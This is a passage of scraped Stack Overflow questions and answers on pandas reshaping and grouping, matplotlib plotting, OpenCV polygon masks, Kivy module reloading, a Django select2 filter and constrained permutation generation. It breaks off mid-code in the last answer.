79,555,053 | 2025-4-4 | https://stackoverflow.com/questions/79555053/group-by-and-apply-multiple-custom-functions-on-multiple-columns-in-python-panda | Consider the following dataframe example: id date hrz tenor 1 2 3 4 AAA 16/03/2010 2 6m 0.54 0.54 0.78 0.19 AAA 30/03/2010 2 6m 0.05 0.67 0.20 0.03 AAA 13/04/2010 2 6m 0.64 0.32 0.13 0.20 AAA 27/04/2010 2 6m 0.99 0.53 0.38 0.97 AAA 11/05/2010 2 6m 0.46 0.90 0.11 0.14 AAA 25/05/2010 2 6m 0.41 0.06 0.96 0.31 AAA 08/06/2010 2 6m 0.19 0.73 0.58 0.80 AAA 22/06/2010 2 6m 0.40 0.95 0.14 0.56 AAA 06/07/2010 2 6m 0.22 0.74 0.85 0.94 AAA 20/07/2010 2 6m 0.34 0.17 0.03 0.77 AAA 03/08/2010 2 6m 0.13 0.32 0.39 0.95 AAA 16/03/2010 2 1y 0.54 0.54 0.78 0.19 AAA 30/03/2010 2 1y 0.05 0.67 0.20 0.03 AAA 13/04/2010 2 1y 0.64 0.32 0.13 0.20 AAA 27/04/2010 2 1y 0.99 0.53 0.38 0.97 AAA 11/05/2010 2 1y 0.46 0.90 0.11 0.14 AAA 25/05/2010 2 1y 0.41 0.06 0.96 0.31 AAA 08/06/2010 2 1y 0.19 0.73 0.58 0.80 AAA 22/06/2010 2 1y 0.40 0.95 0.14 0.56 AAA 06/07/2010 2 1y 0.22 0.74 0.85 0.94 AAA 20/07/2010 2 1y 0.34 0.17 0.03 0.77 AAA 03/08/2010 2 1y 0.13 0.32 0.39 0.95 How can I grouby the variables id, hrz and tenor and apply the following custom functions across the dates? def ks_test(x): return scipy.stats.kstest(np.sort(x), 'uniform')[0] def cvm_test(x): n = len(x) i = np.arange(1, n + 1) x = np.sort(x) w2 = (1 / (12 * n)) + np.sum((x - ((2 * i - 1) / (2 * n))) ** 2) return w2 The desired output is the following dataframe (figure results are just examples): id hrz tenor test 1 2 3 4 AAA 2 6m ks_test 0.04 0.06 0.02 0.03 AAA 2 6m cvm_test 0.09 0.17 0.03 0.05 AAA 2 1y ks_test 0.04 0.06 0.02 0.03 AAA 2 1y cvm_test 0.09 0.17 0.03 0.05 | Use GroupBy.agg with DataFrame.stack for reshape last level of MultiIndex in columns: cols = ['id','hrz', 'tenor'] out = (df.groupby(cols)[df.columns.difference(cols + ['date'], sort=False)] .agg([ks_test, cvm_test]) .rename_axis([None, 'test'], axis=1) .stack(future_stack=True) .reset_index()) print (out) id hrz tenor test 1 2 3 4 0 AAA 2 1y ks_test 0.278182 0.166364 0.254545 0.224545 1 AAA 2 1y cvm_test 0.220803 0.044730 0.158839 0.118321 2 AAA 2 6m ks_test 0.278182 0.166364 0.254545 0.224545 3 AAA 2 6m cvm_test 0.220803 0.044730 0.158839 0.118321 How it working: print (df.groupby(cols)[df.columns.difference(cols +['date'], sort=False)] .agg([ks_test, cvm_test])) 1 2 3 \ ks_test cvm_test ks_test cvm_test ks_test cvm_test id hrz tenor AAA 2 1y 0.278182 0.220803 0.166364 0.04473 0.254545 0.158839 6m 0.278182 0.220803 0.166364 0.04473 0.254545 0.158839 4 ks_test cvm_test id hrz tenor AAA 2 1y 0.224545 0.118321 6m 0.224545 0.118321 | 1 | 2 |
79,554,664 | 2025-4-4 | https://stackoverflow.com/questions/79554664/colorbar-warning-with-pcolor-and-np-nan | I have an array with np.nan values which I want to plot using pcolor. In principle everything works, but I get a warning I cannot get rid of. Using plt.imshow does not give the warning, but I need to specify the x and y coordinates. MatplotlibDeprecationWarning: Getting the array from a PolyQuadMesh will return the full array in the future (uncompressed). To get this behavior now set the PolyQuadMesh with a 2D array .set_array(data2d). import numpy as np import matplotlib as mpl import matplotlib.pyplot as plt x = np.linspace(-2,2,100) y = np.linspace(-2,2,100) X, Y = np.meshgrid(x,y) X[X**2+Y**2>4] = np.nan Y[X**2+Y**2>4] = np.nan Z = np.exp(-(X**2+Y**2)) plt.pcolor(Y,X,Z, cmap='viridis') plt.colorbar() I use matplotlib v3.9.2 and numpy v1.26.4. | This warning is due to a change in how the internal pcolor logic is structured (changenote here). It is triggered when the colorbar code internally calls get_array on the object returned by pcolor. You can silence the warning by explicitly re-passing your Z array to the set_array method: pc = plt.pcolor(Y,X,Z, cmap='viridis') pc.set_array(Z) plt.colorbar() Alternatively, you could upgrade your Matplotlib to version 3.10+, since this deprecation is now expired. | 1 | 2 |
79,553,855 | 2025-4-3 | https://stackoverflow.com/questions/79553855/overlaping-subplots-vertically-stacked | While reading a paper for my thesis I encountered this graph (b): I've tried to recreate the second graph which is the one I would like to use for my results: import numpy as np import matplotlib.pyplot as plt from matplotlib.gridspec import GridSpec years = np.linspace(1300, 2000, 700) np.random.seed(42) delta_13C = np.cumsum(np.random.normal(0, 0.1, 700)) delta_13C = delta_13C - np.mean(delta_13C) delta_18O = np.cumsum(np.random.normal(0, 0.08, 700)) delta_18O = delta_18O - np.mean(delta_18O) temp_anomaly = np.cumsum(np.random.normal(0, 0.03, 700)) temp_anomaly = temp_anomaly - np.mean(temp_anomaly) temp_anomaly[-100:] += np.linspace(0, 1.5, 100) plt.style.use('default') plt.rcParams['font.size'] = 12 plt.rcParams['axes.linewidth'] = 1.5 plt.rcParams['axes.labelsize'] = 14 fig = plt.figure(figsize=(10, 8)) gs = GridSpec(3, 1, height_ratios=[1, 1, 1], hspace=0.2) ax1 = fig.add_subplot(gs[0]) ax1.plot(years, delta_13C, color='green', linewidth=1.0) ax1.set_ylabel('First', color='green', labelpad=10) ax1.tick_params(axis='y', colors='green') ax1.set_xlim(1300, 2000) ax1.set_ylim(-4, 4) ax1.xaxis.set_visible(False) ax1.spines['top'].set_visible(False) ax1.spines['bottom'].set_visible(False) ax1.spines['right'].set_visible(False) ax1.spines['left'].set_color('green') ax2 = fig.add_subplot(gs[1]) ax2.plot(years, delta_18O, color='blue', linewidth=1.0) ax2.yaxis.tick_right() ax2.yaxis.set_label_position("right") ax2.set_ylabel('Second', color='blue', labelpad=10) ax2.tick_params(axis='y', colors='blue') ax2.set_xlim(1300, 2000) ax2.set_ylim(-3, 3) ax2.xaxis.set_visible(False) ax2.spines['top'].set_visible(False) ax2.spines['bottom'].set_visible(False) ax2.spines['left'].set_visible(False) ax2.spines['right'].set_color('blue') ax3 = fig.add_subplot(gs[2]) ax3.plot(years, temp_anomaly, color='gray', linewidth=1.0) ax3.set_ylabel('Third', color='black', labelpad=10) ax3.set_xlim(1300, 2000) ax3.set_ylim(-1.0, 1.5) ax3.set_xlabel('Year (CE)') ax3.spines['top'].set_visible(False) ax3.spines['right'].set_visible(False) plt.show() But the result is a bit different: How can I bring the subplots closer together without blocking each other? As you can see in the graphic in the reference paper, the lines of the subplots almost touch each other. | The main change you'll need to make is to make the background color of your Axes transparent and to use a negative hspace to force the graphs to overlap a bit more: plt.rcParams['axes.facecolor'] = 'none' # transparent Axes background gs = GridSpec(3, 1, height_ratios=[1, 1, 1], hspace=-.1) # negative hspace for overlap Adjusting the y-axis on your second chart will also be necessary here since they currently clip out just a touch of data. 
ax2.set_ylim(-3.5, 3.5) Putting it all back into your script: import numpy as np import matplotlib.pyplot as plt from matplotlib.gridspec import GridSpec years = np.linspace(1300, 2000, 700) np.random.seed(42) delta_13C = np.cumsum(np.random.normal(0, 0.1, 700)) delta_13C = delta_13C - np.mean(delta_13C) delta_18O = np.cumsum(np.random.normal(0, 0.08, 700)) delta_18O = delta_18O - np.mean(delta_18O) temp_anomaly = np.cumsum(np.random.normal(0, 0.03, 700)) temp_anomaly = temp_anomaly - np.mean(temp_anomaly) temp_anomaly[-100:] += np.linspace(0, 1.5, 100) plt.style.use('default') plt.rcParams['font.size'] = 12 plt.rcParams['axes.linewidth'] = 1.5 plt.rcParams['axes.labelsize'] = 14 plt.rcParams['axes.facecolor'] = 'none' # make facecolor transparent fig = plt.figure(figsize=(10, 8)) gs = GridSpec(3, 1, height_ratios=[1, 1, 1], hspace=-.1) # negative hspace for overlap ax1 = fig.add_subplot(gs[0]) ax1.plot(years, delta_13C, color='green', linewidth=1.0) ax1.set_ylabel('First', color='green', labelpad=10) ax1.tick_params(axis='y', colors='green') ax1.set_xlim(1300, 2000) ax1.set_ylim(-4, 4) ax1.xaxis.set_visible(False) ax1.spines['top'].set_visible(False) ax1.spines['bottom'].set_visible(False) ax1.spines['right'].set_visible(False) ax1.spines['left'].set_color('green') ax2 = fig.add_subplot(gs[1]) ax2.plot(years, delta_18O, color='blue', linewidth=1.0) ax2.yaxis.tick_right() ax2.yaxis.set_label_position("right") ax2.set_ylabel('Second', color='blue', labelpad=10) ax2.tick_params(axis='y', colors='blue') ax2.set_xlim(1300, 2000) ax2.set_ylim(-3.5, 3.5) # changed the y-limits ever slightly since the previous clipped data ax2.xaxis.set_visible(False) ax2.spines['top'].set_visible(False) ax2.spines['bottom'].set_visible(False) ax2.spines['left'].set_visible(False) ax2.spines['right'].set_color('blue') ax3 = fig.add_subplot(gs[2]) ax3.plot(years, temp_anomaly, color='gray', linewidth=1.0) ax3.set_ylabel('Third', color='black', labelpad=10) ax3.set_xlim(1300, 2000) ax3.set_ylim(-1.0, 1.5) ax3.set_xlabel('Year (CE)') ax3.spines['top'].set_visible(False) ax3.spines['right'].set_visible(False) plt.show() Of course a touch of structure can clean up the script a bit as well: from collections import namedtuple import numpy as np import matplotlib.pyplot as plt from matplotlib.gridspec import GridSpec years = np.linspace(1300, 2000, 700) np.random.seed(42) delta_13C = np.cumsum(np.random.normal(0, 0.1, 700)) delta_13C = delta_13C - np.mean(delta_13C) delta_18O = np.cumsum(np.random.normal(0, 0.08, 700)) delta_18O = delta_18O - np.mean(delta_18O) temp_anomaly = np.cumsum(np.random.normal(0, 0.03, 700)) temp_anomaly = temp_anomaly - np.mean(temp_anomaly) temp_anomaly[-100:] += np.linspace(0, 1.5, 100) plt.style.use('default') plt.rc('font', size=12) plt.rc('axes', linewidth=1.5, labelsize=14, facecolor='none') PlotSettings = namedtuple('PlotSettings', ['data', 'linecolor', 'labelcolor', 'ylabel', 'yrange']) configurations = [ PlotSettings(delta_13C, linecolor='green', labelcolor='green', ylabel='First', yrange=(-4 , 4 )), PlotSettings(delta_18O, linecolor='blue', labelcolor='blue', ylabel='Second', yrange=(-3.5, 3.5)), PlotSettings(temp_anomaly, linecolor='gray', labelcolor='black', ylabel='Third', yrange=(-1 , 1.5)), ] fig, axes = plt.subplots( nrows=len(configurations), ncols=1, figsize=(10, 8), sharex=True, sharey=False, gridspec_kw={'hspace': -.1}, ) for i, (config, ax) in enumerate(zip(configurations, axes.flat)): ax.plot(years, config.data, color=config.linecolor, linewidth=1.0) # Format the X/Y Axes 
ax.set_ylabel(config.ylabel, color=config.labelcolor, labelpad=10) ax.tick_params(axis='y', colors=config.labelcolor) ax.set_ylim(*config.yrange) ax.xaxis.set_visible(False) # Format the spines ax.spines[['top', 'bottom']].set_visible(False) if (i % 2) == 0: ax.spines['right'].set_visible(False) ax.spines['left' ].set_visible(True) ax.spines['left' ].set_color(config.labelcolor) else: ax.spines['right'].set_visible(True) ax.spines['left' ].set_visible(False) ax.spines['right'].set_color(config.labelcolor) ax.yaxis.tick_right() ax.yaxis.set_label_position("right") # Make special adjustments to the bottom-most plot axes.flat[-1].spines['bottom'].set_visible(True) axes.flat[-1].xaxis.set_visible(True) axes.flat[-1].set_xlabel('Year (CE)') axes.flat[-1].set_xlim(1300, 2000) plt.show() | 2 | 2 |
79,551,690 | 2025-4-2 | https://stackoverflow.com/questions/79551690/drawing-from-opencv-fillconvexpoly-does-not-match-the-input-polygon | I'm trying to follow the solution detailed at this question to prepare a dataset to train a CRNN for HTR (Handwritten Text Recognition). I'm using eScriptorium to adjust text segmentation and transcription, exporting in ALTO format (one XML with text region coordinates for each image) and parsing the ALTO XML to grab the text image regions and export them individually to create a dataset. The problem I'm finding is that I have the region defined at eScriptorium, like this: But when I apply this code from the selected solution for the above linked question: # Initialize mask mask = np.zeros((img.shape[0], img.shape[1])) # Create mask that defines the polygon of points cv2.fillConvexPoly(mask, pts, 1) mask = mask > 0 # To convert to Boolean # Create output image (untranslated) out = np.zeros_like(img) out[mask] = img[mask] and display the image I get some parts of the text region filled: As you can see, some areas that should be inside the mask are filled and, therefore, the image pixels in them are not copied. I've made sure the pixels that make the polygon are correctly parsed and handed to OpenCV to build the mask. I can't find the reason why those areas are filled and I wonder if anyone got into a similar problem and managed to find out the reason or how to avoid it. TIA | You called cv.fillConvexPoly(). Your polygon is not convex. The algorithm assumed it to be convex and took some shortcuts to simplify the drawing code, so it came out wrong. Use cv.fillPoly() instead. That will draw non-convex polygons correctly. As you point out, the function signatures are not drop-in compatible. fillPoly() works on a list of polygons, while fillComplexPoly() just takes a single polygon. cv.fillConvexPoly(img, points, color) # would be replaced with cv.fillPoly(img, [points], color) # list of one polygon Each polygon should be a numpy array of shape (N, 1, 2) and it probably needs to be of an integer dtype too, although I'm not sure about that now and it might support floating point dtype in the future. | 2 | 2 |
79,552,738 | 2025-4-3 | https://stackoverflow.com/questions/79552738/create-a-legend-taking-into-account-both-the-size-and-color-of-a-scatter-plot | I am plotting a dataset using a scatter plot in Python, and I am encoding the data both in color and size. I'd like for the legend to represent this. I am aware of .legend_elements(prop='sizes') but I can have either colors or sizes but not both at the same time. I found a way of changing the marker color when using prop='sizes' with th color argument, but that's not really what I intend to do (they are all the same color). Here is a MWE: import pandas as pd import numpy as np import pylab as pl time = pd.DataFrame(np.random.rand(10)) intensity = pd.DataFrame(np.random.randint(1,5,10)) df = pd.concat([time, intensity], axis=1) size = intensity.apply(lambda x: 10*x**2) fig, ax = pl.subplots() scat = ax.scatter(time, intensity, c=intensity, s=size) lgd = ax.legend(*scat.legend_elements(prop="sizes", num=3, \ fmt="{x:.1f}", func=lambda s: np.sqrt(s/10)), \ title="intensity") and I'd like to have the markers color-coded too. Any help or hint would be appreciated! | Using legend_elements, you can get the size and a colour-based legend elements separately, then set the colours of the former with the latter. E.g., import pandas as pd import numpy as np import matplotlib.pyplot as pl time = pd.DataFrame(np.random.rand(10)) intensity = pd.DataFrame(np.random.randint(1,5,10)) df = pd.concat([time, intensity], axis=1) size = intensity.apply(lambda x: 10*x**2) fig, ax = pl.subplots() scat = ax.scatter(time, intensity, c=intensity, s=size) # get sized-based legend handles size_handles, text = scat.legend_elements( prop="sizes", num=3, fmt="{x:.1f}", func=lambda s: np.sqrt(s/10) ) # get colour-based legend handles colors = [c.get_color() for c in scat.legend_elements(prop="colors", num=3)[0]] # set colours of the size-based legend handles for i, c in enumerate(colors): size_handles[i].set_color(c) # add the legend lgd = ax.legend(size_handles, text, title="intensity") | 1 | 1 |
79,552,332 | 2025-4-3 | https://stackoverflow.com/questions/79552332/unloading-kivy-builder-rules-more-than-once-in-order-to-re-import-gui-elements | I would like to import optional GUI elements defined in separate Mod1.py/Mod2.py/etc files and add/remove these dynamically from the main GUI. The separate files that define these optional GUI elements, contain kv strings. In my use case, these GUI elements can be unloaded/reloaded multiple times. I discovered that if I have identically named classes in the Modx.py files, this creates cross-talk between the modules because Builder.load_string works cumulatively. The background to this discovery is here - Importing multiple modules containing identically named class in python Kivy Builder documentation suggests that a given kv string can be selectively unloaded later if a pseudo filename is supplied e.g. Builder.load_string("""<kv string>""", filename="myrule.kv") and later to unload - Builder.unload_file("myrule.kv") However when I try this, it appears to work only the first time a module is unloaded and another one is loaded. After that the optional GUI elements no longer appear when reloaded. The following example demonstrates this. from kivy.app import App from kivy.uix.boxlayout import BoxLayout from kivy.uix.floatlayout import FloatLayout from kivy.uix.button import Button from kivy.lang import Builder import importlib Builder.load_string(''' <MainWidget>: orientation: 'vertical' BoxLayout: Button: text: "Load Mod 1" on_press: root.load_module(self.text) Button: text: "Load Mod 2" on_press: root.load_module(self.text) Button: text: "Unload all" on_press: dock.clear_widgets() FloatLayout: id: dock ''') class MainWidget(BoxLayout): def load_module(self, hint): self.ids.dock.clear_widgets() Builder.unload_file("foo.kv") if "1" in hint: self.module = importlib.import_module("Mod1").Module() if "2" in hint: self.module = importlib.import_module("Mod2").Module() self.ids.dock.add_widget(self.module) class MyApp(App): def build(self): return MainWidget() if __name__ == '__main__': MyApp().run() Mod1.py from kivy.uix.floatlayout import FloatLayout from kivy.lang import Builder Builder.load_string(''' <Module>: size_hint: None, None size: self.parent.size if self.parent else self.size pos: self.parent.pos if self.parent else self.pos Button: size_hint: None, None width: self.parent.width / 3 height: self.parent.height pos: self.parent.pos text: "Mod 1" on_press: print(root); print([x for x in dir(root) if 'method' in str(x)]) ''', filename="foo.kv") class Module(FloatLayout): def __init__(self, **kwargs): super(FloatLayout, self).__init__(**kwargs) def dummymethod1(self): pass Mod2.py from kivy.uix.floatlayout import FloatLayout from kivy.lang import Builder Builder.load_string(''' <Module>: size_hint: None, None size: self.parent.size if self.parent else self.size pos: self.parent.pos if self.parent else self.pos Button: size_hint: None, None width: self.parent.width / 3 height: self.parent.height pos: (self.parent.x + self.parent.width / 2) , self.parent.y text: "Mod 2" on_press: print(root); print([x for x in dir(root) if 'method' in str(x)]) ''', filename="foo.kv") class Module(FloatLayout): def __init__(self, **kwargs): super(FloatLayout, self).__init__(**kwargs) def dummymethod2(self): pass I would like to know if there is a way to make this work properly. Perhaps I am missing something about the way Kivy builder functions? | I think the importlib will not import a module if it has already been loaded. 
In that case, you can use importlib.reload(). Try modifying your MainWidget class to do that. Something like: class MainWidget(BoxLayout): def __init__(self): self.current_module1 = None self.current_module2 = None super(MainWidget, self).__init__() def load_module(self, hint): self.ids.dock.clear_widgets() Builder.unload_file("foo.kv") if "1" in hint: if self.current_module1: self.current_module1 = importlib.reload(self.current_module1) else: self.current_module1 = importlib.import_module("Mod1") self.module = self.current_module1.Module() if "2" in hint: if self.current_module2: self.current_module2 = importlib.reload(self.current_module2) else: self.current_module2 = importlib.import_module("Mod2") self.module = self.current_module2.Module() self.ids.dock.add_widget(self.module) | 1 | 2 |
79,552,670 | 2025-4-3 | https://stackoverflow.com/questions/79552670/convert-a-column-containing-a-single-value-to-row-in-python-pandas | Consider the following dataframe example: maturity_date simulation simulated_price realized_price 30/06/2010 1 0.539333333 0.611 30/06/2010 2 0.544 0.611 30/06/2010 3 0.789666667 0.611 30/06/2010 4 0.190333333 0.611 30/06/2010 5 0.413666667 0.611 Apart from setting aside the value of the last column and concatenating, is there any other way to adjust the dataframe such that the last column becomes row? Here is the desired output: maturity_date simulation simulated_price 30/06/2010 1 0.539333333 30/06/2010 2 0.544 30/06/2010 3 0.789666667 30/06/2010 4 0.190333333 30/06/2010 5 0.413666667 30/06/2010 realized_price 0.611 | Maybe easier is processing dictionary from last row, DataFrame.pop trick is for remove original column realized_price: d = df.iloc[-1].to_dict() d['simulated_price'] = d.pop('realized_price') d['simulation'] = 'realized_price' df.loc[len(df.pop('realized_price'))] = d Alternative: last = df.columns[-1] d = df.iloc[-1].to_dict() d['simulated_price'] = d.pop(last) d['simulation'] = last df.loc[len(df.pop(last))] = d print (df) maturity_date simulation simulated_price 0 30/06/2010 1 0.539333 1 30/06/2010 2 0.544000 2 30/06/2010 3 0.789667 3 30/06/2010 4 0.190333 4 30/06/2010 5 0.413667 5 30/06/2010 realized_price 0.611000 Another idea is use DataFrame.loc for set new row with default index of DataFrame by select last row in DataFrame.iloc, rename and reappend simulation with new value realized_price in Series.reindex: s = (df.iloc[-1].drop(['simulated_price','simulation']) .rename({'realized_price':'simulated_price'}) .reindex(df.columns[:-1], fill_value='realized_price')) df.loc[len(df.pop('realized_price'))] = s print (df) maturity_date simulation simulated_price 0 30/06/2010 1 0.539333 1 30/06/2010 2 0.544000 2 30/06/2010 3 0.789667 3 30/06/2010 4 0.190333 4 30/06/2010 5 0.413667 5 30/06/2010 realized_price 0.611000 Alternative is first reassign column simulation, then get last row and processing Series: s = (df.assign(simulation='realized_price') .iloc[-1] .drop(['simulated_price']) .rename({'realized_price':'simulated_price'})) df.loc[len(df.pop('realized_price'))] = s print (df) maturity_date simulation simulated_price 0 30/06/2010 1 0.539333 1 30/06/2010 2 0.544000 2 30/06/2010 3 0.789667 3 30/06/2010 4 0.190333 4 30/06/2010 5 0.413667 5 30/06/2010 realized_price 0.611000 Another idea with concat: out = (pd.concat([df, df.iloc[[-1]] .assign(simulation='realized_price', simulated_price=df['realized_price'].iat[0])], ignore_index=True) .drop('realized_price', axis=1)) print (out) maturity_date simulation simulated_price 0 30/06/2010 1 0.539333 1 30/06/2010 2 0.544000 2 30/06/2010 3 0.789667 3 30/06/2010 4 0.190333 4 30/06/2010 5 0.413667 5 30/06/2010 realized_price 0.611000 | 1 | 2 |
79,552,639 | 2025-4-3 | https://stackoverflow.com/questions/79552639/django-select2-autocomplete-how-to-pass-extra-parameter-argid-to-the-view | I'm using Django with django-autocomplete-light and Select2 to create an autocomplete field. The Select2 field is dynamically added to the page when another field is selected. It fetches data from a Django autocomplete view, and everything works fine. Now, I need to filter the queryset in my autocomplete view based on an extra parameter (argId). However, I'm not sure how to pass this parameter correctly. JavaScript (Select2 Initialization) function getElement(argId) { let elementSelect = $("<select></select>"); let elementDiv = $(`<div id='element_id' style='text-align: center'></div>`); elementDiv.append(elementSelect); $(elementSelect).select2({ ajax: { url: "/myautocomplete/class", data: function (params) { return { q: params.term, // Search term arg_id: argId // Pass extra parameter }; }, processResults: function (data) { return { results: data.results // Ensure correct format }; } }, placeholder: "Element...", minimumInputLength: 3 }); return elementDiv; } Django Autocomplete View class ElementAutocomplete(LoginRequiredMixin, autocomplete.Select2QuerySetView): def get_queryset(self): qs = MyModel.objects.filter(...) I want to pass argId from JavaScript to the Django view so that the queryset is filtered accordingly. However, I am not sure if my approach is correct or how to achieve this. Appreciate any suggestions or improvements. Thanks! | Just pass them as query params /myautocomplete/class?title=title_1 and you can catch them in the class class ElementAutocomplete(LoginRequiredMixin, autocomplete.Select2QuerySetView): def get_queryset(self): title = self.request.GET.get("title") qs = MyModel.objects.all() if title is not None: qs.filter(title__icontains=title) | 1 | 1 |
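A sketch of how the two sides line up, combining the question's select2 data callback with the answer's view; MyModel's parent_id and name fields are hypothetical, and self.q is django-autocomplete-light's search term:

# views.py (sketch; field names are assumptions, not from the original post)
class ElementAutocomplete(LoginRequiredMixin, autocomplete.Select2QuerySetView):
    def get_queryset(self):
        qs = MyModel.objects.all()
        arg_id = self.request.GET.get("arg_id")   # sent by the select2 `data` callback
        if arg_id:
            qs = qs.filter(parent_id=arg_id)      # hypothetical FK field
        if self.q:                                # DAL exposes the typed term as self.q
            qs = qs.filter(name__icontains=self.q)
        return qs                                 # note: filter() returns a new queryset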
79,551,904 | 2025-4-3 | https://stackoverflow.com/questions/79551904/how-to-preprocess-multivalue-attributes-in-a-dataframe | Description: Input is a CSV file CSV file contains columns of different data types: Ordinal Values, Nominal Values, Numerical Values and Multi Value For the multivalue columns. Minimum is 1, maximum is 5 values. The input is similar to this: Job Perks Insurance Benefits Online Courses; Certification Programs; Cross Training Life Insurance; Dental Insurance Leadership Development Programs; Online Courses Life Insurance; Accident Insurance Multivalue Expected Output: Job Perks_Online Courses Job Perks_Certification Programs Job Perks_Cross Training Job Perks_Leadership Development Programs Insurance Benefits_Life Insurance Insurance Benefits_Dental Insurance Insurance Benefits_Accident Insurance 1 1 1 0 1 1 0 1 0 0 1 1 0 1 How do I preprocess the CSV input and save it to a dataframe with the above expected output? I am able to preprocess nominal attributes to the expected output(sample code below), but finding it hard to convert multivalues Input: CSV Dataset: https://github.com/omnislayer/WorkDataSet/blob/main/ECP_Unedited.csv Sample Code: #For the nominal: import pandas as pd import numpy as np import dtale #Better STDOUT for dataframes nominalColumns = ["Gender", "Marital Status", "Educational Attainment", "Employment Status", "Company Bonus Structure", "Company Medical Plan Type"] multivalueColumns = ["Job Perks", "Professional Development Opportunities", "Insurance Benefits"] df = pd.read_csv('ECP_Unedited.csv') #Convert Nominal Columns newCols = pd.get_dummies(df[nominalColumns], dtype=int) df = df.drop(columns=nominalColumns) df = pd.concat([df, newCols], axis=1) dtale.show(df) #Convert Multivalue Columns #INSERT CODE HERE! | You could combine str.get_dummies, add_prefix, and pd.concat with a generator: out = pd.concat( ( df[col].str.get_dummies(sep='; ').add_prefix(f'{col}_') for col in multivalueColumns ), axis=1, ) Output: Job Perks_Certification Programs Job Perks_Cross Training Job Perks_Leadership Development Programs Job Perks_Online Courses Insurance Benefits_Accident Insurance Insurance Benefits_Dental Insurance Insurance Benefits_Life Insurance 0 1 1 0 1 0 1 1 1 0 0 1 1 1 0 1 | 3 | 3 |
79,549,771 | 2025-4-2 | https://stackoverflow.com/questions/79549771/efficiently-filter-list-of-permutations | I would like to efficiently generate a list of "valid" permutations from a given list. By way of simple example, suppose I would like to generate the permutations of [1,2,3] where 3 is in one of the first two positions. My return result would then be [[3,1,2], [3,2,1], [1,3,2],[2,3,1]] Currently, I can solve this problem by filtering each permutation in a loop. I don't need to generate all permutations as I can use a bijection from integers to a permutation, just to save on memory. In any case, this method is not really feasible once my list starts to grow - there are simply too many permutations to loop through. A more realistic example is that I would like to generate the permutations of [1,2,...20] with length 10 (20 permute 10), where my rules are something like [1,2] must appear in the first three places (in any order), [3,4] must finish in the first 5 places (in any order), and so on (for any reasonable user input). There are 6.704425728 E+11 values to check in the loop here, so really just too much. My initial thoughts are that there could be two ways to go about this: Generate only valid permutations by using the rules to generate sub-permutations, and then combine them. Somehow represent the permutations in a tree, and apply filtering down the tree. That way, if a node fails a rule, then all children of that node will also fail the rule. This would allow drastically cutting down the checking in a lot of cases (depending on the rules). Has anyone had any experience doing something like this and could provide any guidance? Or is this simply a tricky problem that requires monumental compute? | You'll need a custom solution for that, covering all the types of constraints that you could have. In your examples I can see two types of constraints: A constraint whereby all values in a given set must occur in a certain range (start, end) The size of the produced partial permutations In Python you could think of a class that manages the conditions, and continue as follows: class Condition: def __init__(self, values, start, end): self.originalset = set(values) self.currentset = set(values) self.start = start self.end = end self.stack = [] def assign_value(self, index, value): if value not in self.currentset: # can still consume all conditioned values within the condition's range? return not self.currentset or len(self.currentset) < self.end - index if index < self.start or len(self.currentset) > self.end - index: return False # occurs out of range or too many values remaining # ok self.currentset.remove(value) self.stack.append((index, value)) return True def unassign(self, index): if self.stack and self.stack[-1][0] == index: self.currentset.add(self.stack.pop()[1]) def permutations(values, conditions, size): n = len(values) perm = [] def recur(): k = len(perm) if k == size: yield perm[:] return for i in range(k, n): take = values[i] if all(condition.assign_value(k, take) for condition in conditions): perm.append(take) values[i] = values[k] yield from recur() perm.pop() values[i] = take for condition in conditions: condition.unassign(k) if size <= n: return recur() For a reduced example I took these requirements: Generate the permutations of [1,2,...8] with length 6, where [1,2] must appear in the first three places (in any order), [3,4] must finish in the first 4 places (in any order). 
Here is how you would run that: # input: values = list(range(1, 8)) conditions = [Condition([1,2], 0, 3), Condition([3,4], 0, 4)] size = 6 # generate and print the corresponding permutations for perm in permutations(values, conditions, size): print(perm) This outputs 72 permutations: [1, 2, 3, 4, 5, 6] [1, 2, 3, 4, 5, 7] [1, 2, 3, 4, 6, 5] [1, 2, 3, 4, 6, 7] [1, 2, 3, 4, 7, 6] [1, 2, 3, 4, 7, 5] [1, 2, 4, 3, 5, 6] [1, 2, 4, 3, 5, 7] [1, 2, 4, 3, 6, 5] [1, 2, 4, 3, 6, 7] [1, 2, 4, 3, 7, 6] [1, 2, 4, 3, 7, 5] [1, 3, 2, 4, 5, 6] [1, 3, 2, 4, 5, 7] [1, 3, 2, 4, 6, 5] [1, 3, 2, 4, 6, 7] [1, 3, 2, 4, 7, 6] [1, 3, 2, 4, 7, 5] [1, 4, 2, 3, 5, 6] [1, 4, 2, 3, 5, 7] [1, 4, 2, 3, 6, 5] [1, 4, 2, 3, 6, 7] [1, 4, 2, 3, 7, 6] [1, 4, 2, 3, 7, 5] [2, 1, 3, 4, 5, 6] [2, 1, 3, 4, 5, 7] [2, 1, 3, 4, 6, 5] [2, 1, 3, 4, 6, 7] [2, 1, 3, 4, 7, 6] [2, 1, 3, 4, 7, 5] [2, 1, 4, 3, 5, 6] [2, 1, 4, 3, 5, 7] [2, 1, 4, 3, 6, 5] [2, 1, 4, 3, 6, 7] [2, 1, 4, 3, 7, 6] [2, 1, 4, 3, 7, 5] [2, 3, 1, 4, 5, 6] [2, 3, 1, 4, 5, 7] [2, 3, 1, 4, 6, 5] [2, 3, 1, 4, 6, 7] [2, 3, 1, 4, 7, 6] [2, 3, 1, 4, 7, 5] [2, 4, 1, 3, 5, 6] [2, 4, 1, 3, 5, 7] [2, 4, 1, 3, 6, 5] [2, 4, 1, 3, 6, 7] [2, 4, 1, 3, 7, 6] [2, 4, 1, 3, 7, 5] [3, 2, 1, 4, 5, 6] [3, 2, 1, 4, 5, 7] [3, 2, 1, 4, 6, 5] [3, 2, 1, 4, 6, 7] [3, 2, 1, 4, 7, 6] [3, 2, 1, 4, 7, 5] [3, 1, 2, 4, 5, 6] [3, 1, 2, 4, 5, 7] [3, 1, 2, 4, 6, 5] [3, 1, 2, 4, 6, 7] [3, 1, 2, 4, 7, 6] [3, 1, 2, 4, 7, 5] [4, 2, 1, 3, 5, 6] [4, 2, 1, 3, 5, 7] [4, 2, 1, 3, 6, 5] [4, 2, 1, 3, 6, 7] [4, 2, 1, 3, 7, 6] [4, 2, 1, 3, 7, 5] [4, 1, 2, 3, 5, 6] [4, 1, 2, 3, 5, 7] [4, 1, 2, 3, 6, 5] [4, 1, 2, 3, 6, 7] [4, 1, 2, 3, 7, 6] [4, 1, 2, 3, 7, 5] | 3 | 5 |
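The question's larger case can be expressed with the same Condition class, for example (a sketch; the generator should be consumed lazily since the result set is still huge):

values = list(range(1, 21))                       # 1..20
conditions = [
    Condition([1, 2], 0, 3),                      # {1,2} somewhere in the first three slots
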